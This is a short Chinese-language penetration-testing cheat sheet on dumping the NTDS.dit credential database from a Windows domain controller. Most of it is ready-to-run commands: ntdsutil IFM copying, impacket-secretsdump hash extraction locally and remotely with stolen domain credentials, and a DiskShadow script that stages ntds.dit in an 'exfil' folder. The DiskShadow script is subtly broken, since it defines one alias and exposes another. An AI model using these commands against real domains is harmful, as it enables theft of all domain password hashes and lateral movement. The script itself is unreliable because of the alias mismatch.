NTDS.dit转储
NTDS.dit 文件是 Windows 域控制器上的一个数据库文件,它存储了域内的所有数据,包括用户、组、计算机、组策略、组织单元等。NTDS.dit 文件的位置通常是 C:\Windows\NTDS\NTDS.dit
NTDS.dit 文件是域渗透的重要目标,因为它包含了用户的凭证信息,如密码哈希、PIN 码和 Kerberos 票据等。如果攻击者能够获取 NTDS.dit 文件,就可以利用一些工具和技术,如 mimikatz、secretsdump、vssadmin 等,来提取或利用用户的凭证,从而在域内进行横向移动或提权
Ntdsutil
自 Windows Server 2008 起,可以使用 Ntdsutil 工具复制 NTDS.dit 文件:
ntdsutil "ac i ntds" "ifm" "create full C:\Users\Administrator\Desktop\ntds" quit quit
将生成的文件夹中的system和ntds.dit文件移动到Kali Linux主机并输入以下命令即可提取HASH:
┌──(root㉿kali)-[~]
└─# impacket-secretsdump -system system -ntds ntds.dit local
如果攻击者有可以登录域的用户凭据,则可以通过RPC协议远程转储 NTDS.dit的HASH:
impacket-secretsdump -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER>
DiskShadow
编写shadow.txt文件如下:
set context persistent nowriters
set metadata c:\exfil\metadata.cab
add volume c: alias trophy
create
expose %someAlias% z:该文件指示创建C盘的新卷影磁盘副本,并将其公开为Z:驱动器。
在C盘下创建exfil文件夹并执行以下命令即可转储NTDS.dit文件:
diskshadow.exe /s C:\Users\Administrator\Desktop\shadow.txt; cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
在diskshadow的交互模式,使用以下命令即可删除影子卷:
delete shadows volume trophy
reset工具
ntdsdotsqlite:将 NTDS.dit 文件转换为 SQLite 格式的小实用程序
该工具会提取域对象、用户帐户、计算机帐户、组、组织单位和容器